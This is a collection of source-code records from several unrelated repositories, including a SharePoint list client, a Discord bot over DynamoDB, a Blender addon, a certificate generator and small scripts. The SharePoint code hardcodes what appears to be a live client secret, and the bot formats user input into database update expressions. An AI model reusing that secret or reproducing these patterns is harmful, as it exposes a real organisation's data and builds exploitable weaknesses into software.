'{0}'.format(item.properties[\"OData__x0068_qp8\"])\n data_final = '{0}'.format(item.properties[\"OData__x0078_od1\"])\n data_execucao = '{0}'.format(item.properties[\"ejtw\"])\n ativo = 
'{0}'.format(item.properties[\"ATIVA\"])\n\n autoriazacao = AutorizacaoSharePoint()\n autoriazacao.id_autorizacao = id_autorizacao\n autoriazacao.fornecedor = fornecedor\n autoriazacao.numero_ordem = numero_ordem\n autoriazacao.transportador = transportador\n autoriazacao.nome_motorista = nome_motorista\n autoriazacao.cpf = cpf\n autoriazacao.rg = rg\n autoriazacao.cnh = cnh\n autoriazacao.cavalo = cavalo\n autoriazacao.minicipio_cavalo = minicipio_cavalo\n autoriazacao.carreta_1 = carreta_1\n autoriazacao.municipio_carreta_1 = municipio_carreta_1\n autoriazacao.carreta_2 = carreta_2\n autoriazacao.municipio_carreta_2 = municipio_carreta_2\n autoriazacao.tipo_veiculo = tipo_veiculo\n autoriazacao.procedimento_especial = procedimento_especial\n autoriazacao.numero_eixos = numero_eixos\n autoriazacao.quantidade_ordens = quantidade_ordens\n autoriazacao.geradas = geradas\n autoriazacao.data_inicio = data_inicio\n autoriazacao.data_final = data_final\n autoriazacao.data_execucao = data_execucao\n autoriazacao.ativo = ativo\n autoriazacao._id = _id\n return autoriazacao\n return None\n\n\ndef alterarDataExec(ID, DataExec):\n # Defining the connection parameters\n # ID and secret created through the SharePoint portal\n app_settings = {\n 'url': 'https://usinacoruripe.sharepoint.com/sites/FaturamentoTorta',\n 'client_id': 'c74022f1-d1b5-47e3-913f-84d7a98cf032',\n 'client_secret': 'qfHtOWl6YieOhGAAavzuzUDvuf9pl2ZvD/0JSqvZhsQ='\n }\n\n # Opening the connection to the REST API\n context_auth = AuthenticationContext(url=app_settings['url'])\n context_auth.acquire_token_for_app(client_id=app_settings['client_id'],\n client_secret=app_settings['client_secret'])\n ctx = ClientContext(app_settings['url'], context_auth)\n\n # Fetching the values from the list\n listaShare = ctx.web.lists.get_by_title(\"Autorizações\")\n items = listaShare.get_items()\n ctx.load(items)\n ctx.execute_query()\n\n item = listaShare.get_item_by_id(ID)\n item.set_property('ejtw', DataExec)\n item.set_property('OData__x006d_kv6', '0')\n item.update()\n ctx.execute_query()\n\n\ndef alterarGeradas(ID, sumGeradas):\n # Defining the connection parameters\n # ID and secret created through the SharePoint portal\n app_settings = {\n 'url': 'https://usinacoruripe.sharepoint.com/sites/FaturamentoTorta',\n 'client_id': 'c74022f1-d1b5-47e3-913f-84d7a98cf032',\n 'client_secret': 'qfHtOWl6YieOhGAAavzuzUDvuf9pl2ZvD/0JSqvZhsQ='\n }\n\n # Opening the connection to the REST API\n context_auth = AuthenticationContext(url=app_settings['url'])\n context_auth.acquire_token_for_app(client_id=app_settings['client_id'],\n client_secret=app_settings['client_secret'])\n ctx = ClientContext(app_settings['url'], context_auth)\n\n # Fetching the values from the list\n listaShare = ctx.web.lists.get_by_title(\"Autorizações\")\n items = listaShare.get_items()\n ctx.load(items)\n ctx.execute_query()\n\n item = listaShare.get_item_by_id(ID)\n item.set_property('OData__x006d_kv6', sumGeradas)\n item.update()\n ctx.execute_query()\n","repo_name":"kslima/bootTransp","sub_path":"conexao_share_point.py","file_name":"conexao_share_point.py","file_ext":"py","file_size_in_byte":7558,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22831423815","text":"import discord\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import Bot\r\nfrom discord.ext.commands import Context\r\nimport asyncio\r\nimport boto3\r\nfrom boto3.dynamodb.conditions import Key, Attr\r\n\r\nAccess_Key =\"\"\r\nSecret_Key = \"\"\r\n\r\nsession = 
boto3.Session(aws_access_key_id=Access_Key,\r\n aws_secret_access_key=Secret_Key,\r\n region_name='eu-west-2')\r\ndynamodb = session.resource('dynamodb')\r\nLisBot = commands.Bot(command_prefix='!')\r\nLisDB = dynamodb.Table('LisperroDB')\r\n\r\n\r\n@LisBot.event\r\nasync def on_ready():\r\n print(\"Ready\")\r\n\r\n@LisBot.command(pass_context=True)\r\nasync def list(ctx):\r\n InfoRow = []\r\n response = LisDB.scan(\r\n ProjectionExpression= 'GuildImprovements, #l, #u',\r\n ExpressionAttributeNames={'#l': 'Current Level','#u': 'Upkeep'}\r\n )\r\n items = response['Items']\r\n for count, place in enumerate(items,1):\r\n if(place['GuildImprovements'] == 'Guild Hall'):\r\n InfoRow.append(str(count) + \". \" + place['GuildImprovements'] + \" - Lvl.\" + str(place['Current Level']) + \" - Total Upkeep: \" + str(place['Upkeep']) + \"gp\")\r\n else:\r\n InfoRow.append(str(count) + \". \" + place['GuildImprovements'] + \" - Lvl.\" + str(place['Current Level']) + \" - Upkeep: \" + str(place['Upkeep']) + \"gp\")\r\n message= \"\\n\".join(InfoRow)\r\n embededList = discord.Embed(title=\"List of Buildings\", description=message, color=0x35f4ff)\r\n await LisBot.say(embed = embededList)\r\n \r\n@LisBot.command(pass_context=True)\r\nasync def info(ctx, *,improvName):\r\n print(improvName)\r\n response = LisDB.query(\r\n KeyConditionExpression=Key('GuildImprovements').eq(improvName)\r\n )\r\n placeholder = response['Items']\r\n print(placeholder)\r\n if not placeholder:\r\n await LisBot.say(\"Im sorry, but I can't find that information.\")\r\n else:\r\n improvInfo = placeholder[0]\r\n contactName = improvInfo.get('ContactName','')\r\n infoBlock = discord.Embed(title=improvName,description=improvInfo.get('Description') ,color=0x123456)\r\n infoBlock.add_field(name=\"Current Level\",value=improvInfo.get('Current Level'),inline=True)\r\n if(len(contactName)>2):\r\n infoBlock.add_field(name=\"Practitioner\", value = contactName, inline=True)\r\n infoBlock.add_field(name=\"Effect Next Level\",value=improvInfo.get('Next Level Bonus'), inline=False)\r\n infoBlock.add_field(name=\"Gold Invested\",value=str(improvInfo.get('Gold Invested'))+'gp',inline=True)\r\n if('BaseUpkeep' in improvInfo):\r\n infoBlock.add_field(name=\"Total Upkeep\",value=str(improvInfo.get('Upkeep'))+'gp',inline=True)\r\n else:\r\n infoBlock.add_field(name=\"Upkeep\",value=str(improvInfo.get('Upkeep'))+'gp',inline=True)\r\n infoBlock.add_field(name=\"Gold For Next Level\",value=str(improvInfo.get('Gold For Next Level'))+'gp',inline=True)\r\n\r\n await LisBot.say(embed = infoBlock)\r\n\r\n@LisBot.command(pass_context=True)\r\nasync def set(ctx,*, updateVal):\r\n print(ctx.message.author.top_role)\r\n top_role = ctx.message.author.top_role\r\n \r\n if(str(top_role) != \"GM\"): #Only those with the role of GM in discord should be able to access this infomation\r\n await LisBot.say(\"Sorry you do not have access to that information\")\r\n else:\r\n updateList = []\r\n for x in updateVal.split(','):\r\n updateList.append(x.strip())\r\n print(updateList)\r\n if(len(updateList) != 3):\r\n await LisBot.say(\"It seems you gave me the wrong amount of information.\")\r\n else:\r\n LisDB.update_item(\r\n Key={'GuildImprovements': updateList[0]},\r\n ConditionExpression = 'attribute_exists({})'.format(updateList[1]),\r\n UpdateExpression = 'SET {} = :val1'.format(updateList[1]),\r\n ExpressionAttributeValues={':val1': updateList[2]}\r\n )\r\n await LisBot.say(\"Thanks for the update.\")\r\n \r\n@LisBot.command(pass_context=True)\r\nasync def 
upkeep(ctx):\r\n response = LisDB.scan(\r\n ProjectionExpression='Upkeep, BaseUpkeep'\r\n )\r\n items = response['Items']\r\n print(items)\r\n upkeepSum = 0\r\n for x in items:\r\n if('BaseUpkeep' in x):\r\n upkeepSum = upkeepSum + x.get('BaseUpkeep',0)\r\n else:\r\n upkeepSum = upkeepSum + x.get('Upkeep')\r\n LisDB.update_item(\r\n Key={'GuildImprovements': 'Guild Hall'},\r\n UpdateExpression = 'SET Upkeep = :val1',\r\n ExpressionAttributeValues={':val1': upkeepSum}\r\n )\r\n await LisBot.say(\"I've gone over the accounts and updated the total upkeep.\\nTotal Upkeep: {}gp per month\".format(upkeepSum))\r\n\r\n@LisBot.command(pass_context=True)\r\nasync def rent(ctx, rentInput):\r\n print(ctx.message.author.display_name)\r\n usr_name = ctx.message.author.display_name\r\n print(rentInput)\r\n if(rentInput.isdigit() == False):\r\n await LisBot.say(\"The value entered is not a number\")\r\n elif(int(rentInput) == 0):\r\n await LisBot.say(\"0 is not an acceptable input\")\r\n else:\r\n currentEntry = usr_name + \": \" + rentInput +\"gp @ \" + str(ctx.message.timestamp) +\"\\n\"\r\n appendFile = open(\"rent_history.txt\", \"a\")\r\n appendFile.write(currentEntry)\r\n appendFile.close()\r\n readFile = open(\"rent_history.txt\", \"r\")\r\n paymentList = readFile.read()\r\n print(paymentList)\r\n response = LisDB.get_item(\r\n Key={'GuildImprovements' : 'Guild Hall'},\r\n ProjectionExpression='Upkeep, Rent'\r\n )\r\n totalRent = response['Item'].get('Upkeep')\r\n print(\"total = \" + str(totalRent))\r\n currentRent = int(response['Item'].get('Rent'))\r\n currentRent = currentRent + int(rentInput)\r\n print(\"current = \" + str(currentRent))\r\n LisDB.update_item(\r\n Key={'GuildImprovements' : 'Guild Hall'},\r\n UpdateExpression = 'SET Rent = :val1',\r\n ExpressionAttributeValues={':val1': str(currentRent)}\r\n )\r\n rentInfo = \"So far you have paid \" + str(currentRent) + \"gp out of a total of \" + str(totalRent) +\"gp\"\r\n rentBlock = discord.Embed(title=\"Summary of Rent\", description = rentInfo ,color=0x123456)\r\n rentBlock.add_field(name=\"Payment History\",value=paymentList,inline=True)\r\n await LisBot.say(embed = rentBlock)\r\n\r\nLisBot.run(\"\") #insert discord api key here","repo_name":"NGovani/Westmarches_Discord_bot","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39842916562","text":"# see https://medium.com/geekculture/creating-a-custom-panel-with-blenders-python-api-b9602d890663\n\nbl_info = {\n \"name\": \"Fur tools\",\n \"description\": \"Fur tools.\",\n \"author\": \"PVS\",\n \"version\": (1, 0),\n \"blender\": (3, 2, 0),\n \"location\": \"Properties > Object > My Awesome Panel\",\n \"warning\": \"\", # used for warning icon and text in add-ons panel\n \"wiki_url\": \"\",\n \"category\": \"Object\"\n }\n\nimport bpy\n\nfrom .select_twisted_quads_operator import SelectTwistedQuadsOperator\n\nfrom .copy_vertex_colors import CopyVertexColorsOperator\n\nfrom .recalc_normals_as_ref_object import RecalcNormalsAsRefObjectOperator\n\nfrom .gen_uv_by_colors_operator import GenUVByVertexColorsOperator\n\nfrom .recalc_anim_pivot_operator import RecalcAnimPivotOperator\n\nfrom .mask_fixed_operator import MaskFixedOperator\n\nfrom .copy_anim_operator import CopyAnimOperator\nfrom .ui import FurPanel\nfrom . 
import properties\nfrom .gen_fur2_operator import GenFurOperator\n\nCLASSES = [\n GenFurOperator,\n CopyAnimOperator,\n FurPanel,\n MaskFixedOperator,\n RecalcAnimPivotOperator,\n GenUVByVertexColorsOperator,\n RecalcNormalsAsRefObjectOperator,\n CopyVertexColorsOperator,\n SelectTwistedQuadsOperator\n]\n\ndef register():\n properties.register()\n for cls in CLASSES:\n bpy.utils.register_class(cls)\n\ndef unregister():\n properties.unregister()\n for cls in CLASSES:\n bpy.utils.unregister_class(cls)\n\nif __name__ == '__main__':\n register()","repo_name":"deep-ar/blender_fur_tools","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21842447917","text":"# May 16 2020 LeetCode May Challenge\n#\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def oddEvenList(self, head: ListNode) -> ListNode:\n '''\n 0 > 1->2->3->4->5\n odd 0 > 1->3->5->None\n even 0 > 2->4->None\n '''\n # two pointers for odd and even\n start1 = odd = ListNode(0)\n start2 = even = ListNode(0)\n while head:\n # pick up the odd/even nodes of the original LL\n odd.next = head\n even.next = head.next\n # move to the next node in the new odd/even LLs\n odd = odd.next\n even = even.next\n # move to the unassigned node of the original LL\n if even:\n head = head.next.next\n # end the loop if all nodes are assigned\n else:\n head = None\n # connect the odd LL to the even LL\n odd.next = start2.next\n return start1.next\n\n\n# test case\nn = 5\nhead = ListNode(1)\ncur = head\nfor i in range(n-1):\n cur.next = ListNode(i+2)\n cur = cur.next\n# solve it\nsol = Solution()\nans = sol.oddEvenList(head)\n# output the result\nLL = []\ncur = ans\nfor i in range(n):\n LL.append(cur.val)\n cur = cur.next\nprint(LL)\n","repo_name":"JieFrye/leetcode","sub_path":"LinkedList/OddEvenLinkedList.py","file_name":"OddEvenLinkedList.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36739425901","text":"from utils import load_coefficients, save_coefficients\nimport cv2\nimport sys\nimport numpy as np\nimport platform\nfrom time import time\n\nTEST = platform.system()=='Windows'\n\nif TEST:\n location = 'photos\\\\'\n \nelse:\n location = '/home/pi/shared/'\n \n# Load coefficients\n#mtx, dist = load_coefficients('calibration_charuco.yml')\n\ntry:\n filename=sys.argv[1]\nexcept:\n pass \n \ndef create_opencv_image_from_stringio(img_stream, cv2_img_flag=0):\n img_stream.seek(0)\n img_array = np.asarray(bytearray(img_stream.read()), dtype=np.uint8)\n return cv2.imdecode(img_array, cv2_img_flag)\n\ndef undistort_file(filename,mapx, mapy):\n #mtx, dist = load_coefficients('calibration_charuco.yml')\n original = cv2.imread(f'calibration_test\\\\{filename}.jpeg')\n #dst = cv2.undistort(original, mtx, dist, None, mtx)\n dst=cv2.remap(original, mapx, mapy, cv2.INTER_LINEAR)\n cv2.imwrite(f'out\\\\{filename}.jpg', dst)\n cv2.imwrite(f'out\\\\{filename}_undist.jpg', original)\n\ndef undistort_image(img,filename,mapx, mapy):\n #mtx, dist = load_coefficients('calibration_charuco.yml')\n start = time()\n original = create_opencv_image_from_stringio(img,cv2.IMREAD_ANYCOLOR+cv2.IMREAD_ANYDEPTH)\n end = time()\n bytes_to_opencv = end-start\n #dst = cv2.undistort(original, mtx, dist, None, mtx)\n start = time()\n 
dst=cv2.remap(original, mapx, mapy, cv2.INTER_LINEAR)\n dst=cv2.resize(dst,None, fx = 1, fy = 0.93, interpolation = cv2.INTER_CUBIC)\n cv2.imwrite(f'{location}{filename}.jpg', dst)\n end = time()\n undistort_time = end-start\n print (\"undistort time: \", bytes_to_opencv,\"+\",undistort_time)\n #cv2.imwrite(f'{location}{filename}_raw.jpg',original)","repo_name":"Den-K-O/slab-photo-gui","sub_path":"undistort_charuco.py","file_name":"undistort_charuco.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73447740853","text":"import os, requests, json, time\nfrom datetime import datetime\nfrom log_util import * \n\ndef load_config():\n config_file = 'config/config.json'\n config=open(config_file).read()\n return json.loads(config)\n\ndef getTargetPath(asset):\n target_full_path = config_json['path_to_download'] + asset\n return os.path.dirname(target_full_path), os.path.basename(target_full_path)\n\ndef logStatus(msg):\n s_log.info(msg)\n print (msg)\n\ndef get_timestamp():\n return datetime.now().strftime('%d %b %Y, %H:%M:%S')\n\n# Start \ns_time = get_timestamp()\n\n\n#Load config\nconfig_json = load_config()\n\n# Initialize loggers\nt_log = get_logger(config_json['trace_log'])\ne_log = get_logger(config_json['error_log'])\ns_log = get_output_handler(config_json['status_log'])\n\n# Initialize output file handler (uses log library)\ns_handle = get_output_handler(config_json['successful_assets'])\nf_handle = get_output_handler(config_json['failed_assets'])\n\n# Initialize variables\nassets_to_upload = []\ntotal = 0\nfailure = 0\n\ntry:\n\n for r, d, f in os.walk(config_json['source_dir']):\n for asset in f:\n t_log.info(r)\n t_log.info(asset)\n t_log.info(os.path.join(r, asset))\n assets_to_upload.append(os.path.join(r, asset))\n\n \nexcept Exception as e:\n e_log.error('Unexpected Error : '+str(e))\n\n\n# Report status\nlogStatus(\"\\nStatus:\\n=======\")\nlogStatus(\"Download start time : \"+s_time)\nlogStatus(\"Download completion time : \"+get_timestamp())\nlogStatus(\"Assets downloaded : \"+str(total - (failure)))\nif failure :\n logStatus(\"Download failed : \"+str(failure))\n logStatus(\"Check the logs at \"+config_json['error_log']+\" for error details\")\n\n","repo_name":"ashokkumarta/aem-dam-uploader","sub_path":"scripts/asset-upload.py","file_name":"asset-upload.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2057777850","text":"import threading\nimport time\n\nfrom . import __config as _c\nfrom . import __debounce as _d\nfrom . import __proxy as _p\nfrom . import __toast as _t\nfrom . 
import __utils as _u\n\nAUTO_MAP_ENABLED_ENTRY = \"auto_map\"\nAUTO_MAP_CONFIG_ENTRY = \"auto_map_config\"\nDEPRECATED_STR = \"配置失效\"\nNULL_KEY_REPLACEMENT = \"TlVMX0FTX0Y=\\u0000\"\n\n\ndef _saveConfig() -> None:\n replacedConfig = {\n (NULL_KEY_REPLACEMENT if k is None else k): v for k, v in _config.items()\n }\n _c.setGeneral(AUTO_MAP_CONFIG_ENTRY, replacedConfig)\n\n\ndef _loadConfig() -> dict[str | None, str | None]:\n replacedConfig: dict[str, str | None] = _c.getGeneral(AUTO_MAP_CONFIG_ENTRY, {})\n return {\n k if k != NULL_KEY_REPLACEMENT else None: v for k, v in replacedConfig.items()\n }\n\n\ndef _networkChangeDetection() -> None:\n global _lastSSID\n while _active:\n if not _u.isConnected():\n while _active:\n if _u.isConnected():\n break\n time.sleep(1)\n else:\n return\n ssid = _u.getSSID()\n if ssid != _lastSSID:\n applyMapping()\n _lastSSID = ssid\n time.sleep(1)\n\n\n@_d.debounce(2000)\ndef applyMapping(force: bool = False) -> None:\n global _lastSSID\n if force:\n _lastSSID = _u.getSSID()\n if _lastSSID in _config: # assuming is connected\n confName = _config[_lastSSID]\n if confName is not None and confName in _c.proxyConfig:\n _c.proxyConfig[confName].apply()\n _p.setEnabled(True)\n _t.toast(f\"根据网络 [{_lastSSID or '有线连接'}],使用配置 [{confName}]\")\n return\n _p.setEnabled(False)\n _t.toast(f\"根据网络 [{_lastSSID or '有线连接'}],已禁用代理\")\n\n\ndef _checkMapping() -> None:\n for ssid, confName in _config.items():\n if confName is not None and confName not in _c.proxyConfig:\n _config[ssid] = DEPRECATED_STR\n\n\ndef start(skipConf: bool = False) -> None:\n global _active, _thread\n if not skipConf:\n _c.setGeneral(AUTO_MAP_ENABLED_ENTRY, True)\n _active = True\n if not _thread.is_alive():\n _thread = threading.Thread(target=_networkChangeDetection, daemon=True)\n _thread.start()\n\n\ndef stop() -> None:\n global _active\n _c.setGeneral(AUTO_MAP_ENABLED_ENTRY, False)\n _active = False\n if _thread.is_alive():\n _thread.join()\n\n\ndef active() -> bool:\n return _active\n\n\ndef config() -> dict[str | None, str | None]:\n _checkMapping()\n return _config\n\n\ndef addMapping(ssid: str | None, confName: str | None) -> None:\n _config[ssid] = confName\n _saveConfig()\n\n\ndef removeMapping(ssid: str | None) -> None:\n _config.pop(ssid, None)\n _saveConfig()\n\n\n_active: bool = _c.getGeneral(AUTO_MAP_ENABLED_ENTRY, False)\n_lastSSID: str | None = _u.getSSID()\n_thread: threading.Thread = threading.Thread(\n target=_networkChangeDetection, daemon=True\n)\n_config: dict[str | None, str | None] = _loadConfig()\n\n_checkMapping()\nif _active:\n applyMapping()\n start(skipConf=True)\n","repo_name":"JUS4HR/proxy-control","sub_path":"App/__mapping.py","file_name":"__mapping.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41246628597","text":"import json\nfrom pathlib import Path\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\n\nfrom bookmarks.models import Bookmark, Row\n\n\ndef walk(texts, node, i=0, parent=None, path=None):\n if path is None:\n path = path or []\n indent = len(path)\n print('-', indent * \" \", node['enTitle'])\n parent = Bookmark.objects.create(\n parent=parent,\n ordinal=i,\n title=node['heTitle'],\n )\n i += 1\n if 'nodes' in node:\n for n in node['nodes']:\n i = walk(texts, n, i, parent, path + [n['enTitle']])\n else:\n d = texts\n for k in path:\n d = d[k]\n for row in d:\n 
Row.objects.create(\n bookmark=parent,\n ordinal=i,\n content=row,\n )\n i += 1\n return i\n\n\nclass Command(BaseCommand):\n help = \"Load haggadah bookmarks and text.\"\n\n def handle(self, *args, **options):\n with (Path(settings.BASE_DIR) / \"data/haggadah.json\").open() as f:\n data = json.load(f)\n with transaction.atomic():\n walk(data['text'], data['schema'])\n","repo_name":"nonZero/Hagadot","sub_path":"bookmarks/management/commands/import_bookmarks.py","file_name":"import_bookmarks.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44311856691","text":"import datetime\nimport os\nimport sys\nfrom cryptography import x509\nfrom cryptography.x509.oid import NameOID\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\n\n\n# def standardize(s):\n# return s.strip().removeprefix('http://').removeprefix('https://').removesuffix('/')\ndef standardize(s):\n s = s.strip()\n if s.startswith('http://'):\n s = s[len('http://'):]\n if s.startswith('https://'):\n s = s[len('https://'):]\n if s.endswith('/'):\n s = s[:-1]\n return s\n\n\ndef check_domain(domain):\n if domain == '':\n domain = input(\"please type domain:\\n\")\n while domain.strip() == '': domain = input()\n return check_domain(domain)\n else:\n str = input(\">>>>>>>>\\n {domain} \\n>>>>>>>>\\n[y/n (q to exit)]:\".format(domain=domain)).lower()\n if str == \"n\":\n domain = input(\"please type domain:\\n\")\n while domain.strip() == '': domain = input()\n return check_domain(domain)\n elif str == \"q\":\n sys.exit(0)\n else:\n return domain\n\n\ndef get_domain():\n fname = 'domain.txt'\n domains = []\n try:\n with open(fname, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n domains.append(line)\n finally:\n for idx, domain in enumerate(domains):\n domains[idx] = standardize(domain)\n\n domain_str = \"\\n\".join(domains) if len(domains) != 0 else \"\"\n check_domain(domain_str)\n return domains\n\n\ndef generator(domains, prefix):\n root_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n backend=default_backend()\n )\n print(' generated!')\n subject = issuer = x509.Name([\n x509.NameAttribute(NameOID.COUNTRY_NAME, u\"US\"),\n x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u\"CA\"),\n x509.NameAttribute(NameOID.LOCALITY_NAME, u\"San Jose\"),\n x509.NameAttribute(NameOID.ORGANIZATION_NAME, u\"ygeng\"),\n x509.NameAttribute(NameOID.COMMON_NAME, u\"ygeng\"),\n ])\n root_cert = x509.CertificateBuilder().subject_name(\n subject\n ).issuer_name(\n issuer\n ).public_key(\n root_key.public_key()\n ).serial_number(\n x509.random_serial_number()\n ).not_valid_before(\n datetime.datetime.utcnow()\n ).not_valid_after(\n datetime.datetime.utcnow() + datetime.timedelta(days=3650)\n ).add_extension(\n x509.BasicConstraints(ca=True, path_length=None), critical=True\n ).sign(root_key, hashes.SHA256(), default_backend())\n print(' generated!')\n\n # Now we want to generate a cert from that root\n cert_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n backend=default_backend()\n )\n print(' generated!')\n new_subject = x509.Name([\n x509.NameAttribute(NameOID.COUNTRY_NAME, u\"US\"),\n x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u\"CA\"),\n x509.NameAttribute(NameOID.LOCALITY_NAME, u\"San 
Jose\"),\n x509.NameAttribute(NameOID.ORGANIZATION_NAME, u\"testAPP\"),\n x509.NameAttribute(NameOID.COMMON_NAME, u\"testAPP\")\n ])\n cert = x509.CertificateBuilder().subject_name(\n new_subject\n ).issuer_name(\n root_cert.issuer\n ).public_key(\n cert_key.public_key()\n ).serial_number(\n x509.random_serial_number()\n ).not_valid_before(\n datetime.datetime.utcnow()\n ).not_valid_after(\n datetime.datetime.utcnow() + datetime.timedelta(days=90)\n ).add_extension(\n x509.SubjectAlternativeName([x509.DNSName(domain) for domain in domains]), # add domain info\n critical=False,\n ).sign(root_key, hashes.SHA256(), default_backend())\n print(' generated!')\n\n ROOT_CERT_FILE = prefix + '/ca.crt'\n CERT_FILE = prefix + \"/app.crt\"\n KEY_FILE = prefix + \"/app.key\"\n\n # with open(ROOT_CERT_FILE, \"wb\") as root_cert_file:\n # root_cert_file.write(root_cert.public_bytes(serialization.Encoding.PEM))\n\n with open(CERT_FILE, \"wb\") as cert_file:\n cert_file.write(cert.public_bytes(serialization.Encoding.PEM))\n\n with open(KEY_FILE, \"wb\") as key_file:\n key_file.write(cert_key.private_bytes(serialization.Encoding.PEM,\n serialization.PrivateFormat.TraditionalOpenSSL,\n serialization.NoEncryption()))\n\n\nif __name__ == \"__main__\":\n domains = get_domain()\n prefix = \"APP_\" + domains[0].split(\".fortiweb\", 1)[0]\n if os.path.isdir(prefix):\n if os.path.exists(prefix + \"/app.crt\"):\n print(\"custom cert exists!\")\n sys.exit(0)\n else:\n os.makedirs(prefix)\n generator(domains, prefix + '/')\n","repo_name":"yijiegeng/cert_generator","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18513338889","text":"from apps.core.models import Person\nfrom rest_framework.serializers import ModelSerializer\nfrom apps.location.serializers.city_serializers import CitySerializer, CreateCitySerializer\n\n\nclass UserSerializer(ModelSerializer):\n city = CreateCitySerializer(many=False, read_only=True)\n\n class Meta:\n model = Person\n fields = [\n \"id\",\n \"image\",\n \"name\",\n \"username\",\n \"contact\",\n \"latitude\",\n \"longitude\",\n \"is_moderator\",\n \"is_active\",\n \"is_admin\",\n \"city\",\n ]\n\n\nclass CreatePersonSerializer(ModelSerializer):\n class Meta:\n model = Person\n fields = [\n \"id\",\n \"contact\",\n \"city\",\n \"user\",\n ]\n\n\nclass UpdatePersonSerializer(ModelSerializer):\n class Meta:\n model = Person\n fields = [\n \"image\",\n \"contact\",\n \"latitude\",\n \"longitude\",\n \"city\",\n ]\n\n\nclass UpdatePersonImageSerializer(ModelSerializer):\n class Meta:\n model = Person\n fields = [\"image\"]\n","repo_name":"PedroHenriqueDevBR/adocao-animal-web","sub_path":"backend/animal_adoption/apps/account/serializers/user_serializers.py","file_name":"user_serializers.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"44094125228","text":"# Polar plot:\nimport pylab as plb \n\nplb.axes([0.065,0.065,0.88,0.88], polar = True)\n\nq = 24\nt = plb.arange(0.015, 3*plb.pi, 3*plb.pi/q)\nrad = 12 * plb.rand(q)\nw = plb.pi / 4 * plb.rand(q)\nba = plb.bar(t, rad, width = w)\n\nfor r , bar in zip(rad, ba):\n bar.set_facecolor(plb.cm.jet(r/12.0))\n 
bar.set_alpha(0.75)\r\n\r\nplb.show()\r\n\r\n\r\n","repo_name":"anupkumarn/Berkeley-Class","sub_path":"L6_E9.py","file_name":"L6_E9.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73349963251","text":"data_dir = '../Dataset/Dubai'\nimage_dir = 'IMAGES'\nlabel_dir = 'LABELS'\nphi = 4\nepochs = 50\nsteps = 1000\nbatch_size = 2\nweight_path = 'imagenet'\nimage_size = (512, 640, 768, 896, 1024, 1280, 1408)[phi]\nclasses = {'DAMAGE': 0}\n","repo_name":"jahongir7174/EfficientDet-tf","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"3849535745","text":"from handleData import *\nfrom pipe import *\nfrom sklearn.cluster import KMeans\nimport os\nimport numpy as np\nimport pandas as pd\nos.chdir('..')\nos.chdir('..')\nos.chdir('..')\nos.chdir('Data')\n\naggr_surv = pd.read_excel('agg_survey_vars.xlsx')\naggr_surv_filled = replace_value(aggr_surv,list(aggr_surv),np.NaN,0)\nvar_names = list(aggr_surv_filled)\nvar_names.remove('economycode')\nvar_names.remove('economy')\ncountries = aggr_surv_filled['economy']\naggr_nums_only = aggr_surv_filled[var_names]\ntest = KMeans(n_init = 200)\nclusters = pd.DataFrame(test.fit_predict(aggr_nums_only))\ncountries_clusters = pd.concat([countries, clusters],axis=1)\ncluster_sort = countries_clusters.sort_values(0)\n\nmacro_surv = pd.read_excel('macro_vars.xlsx')\nmacro_surv_nums = macro_surv.convert_objects(convert_numeric=True)\nmacro_surv_filled = replace_value(macro_surv_nums,list(macro_surv_nums),np.NaN,0)\nvar_names = list(macro_surv_filled)\nvar_names.remove('economycode')\nvar_names.remove('economy')\nmacro_countries = macro_surv_filled['economy']\nvar_nums_only = macro_surv_filled[var_names]\nmacro_clusters = pd.DataFrame(test.fit_predict(var_nums_only))\nmacro_countries_clusters = pd.concat([macro_countries, macro_clusters],axis=1)\nmacro_cluster_sort = 